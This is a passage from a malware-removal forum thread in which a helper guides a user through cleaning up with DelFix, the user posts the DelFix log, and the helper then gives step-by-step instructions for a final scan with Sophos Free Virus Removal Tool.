This is a very crucial step so make sure you don't skip it.
Download DelFix by Xplode to your desktop. Delfix will delete all the used tools and logfiles.

Double-click Delfix.exe to start the tool.
Make sure the following items are checked:

  • Activate UAC (optional; some users prefer to keep it off)
  • Remove disinfection tools
  • Create registry backup
  • Purge System Restore
  • Reset system settings

Now click "Run" and wait patiently.

 

How did you go? Is everything ok now?



#11 HonSern


Posted 04 September 2016 - 06:53 PM

Hi TsVk,

 

I'm not sure why but the ESET online scanner that you recommended was not able to complete the scan on my hard disk.

It failed once yesterday night and I was hoping that by leaving it overnight, the scan will be completed by the next morning but it shows up as being a software that is not responsive.

 

I will run a full diagnostic using Norton instead to check the health of my system.

 

DELFIX LOG

 

# DelFix v1.013 - Logfile created 05/09/2016 at 07:46:12
# Updated 17/04/2016 by Xplode
# Username : User - MSI
# Operating System : Windows 10 Home Single Language  (64 bits)
 
~ Activating UAC ... OK
 
~ Removing disinfection tools ...
 
Deleted : C:\AdwCleaner
Deleted : C:\Users\User\Desktop\mbar
 
~ Creating registry backup ... OK
 
~ Cleaning system restore ...
 
 
New restore point created !
 
~ Resetting system settings ... OK
 
########## - EOF - ##########
 
Thank you for all your help!
I will take more precaution with the stuff I download in the future.


#12 TsVk!


Posted 04 September 2016 - 07:04 PM

Hi HonSern

 

Let's just give it one last scan to make sure there's nothing left (ESET not completing concerns me).

 

Download Sophos Free Virus Removal Tool and save it to your desktop.

  • Double click the icon and select Run
  • Click Next
  • Select I accept the terms in this license agreement, then click Next twice
  • Click Install
  • Click Finish to launch the program
  • Once the virus database has been updated click Start Scanning
  • If any threats are found click Details, then View log file... (bottom left hand corner)
  • Copy and paste the results in your reply
  • Close the Notepad document, close the Threat Details screen, then click Start cleanup
  • Click Exit to close the program

Let me know how you go.

 

TsVk!



#13 HonSern


Posted 04 September 2016 - 08:16 PM

Hi TsVk,

 

Will do so tonight after coming back from work 

 

Thanks! 





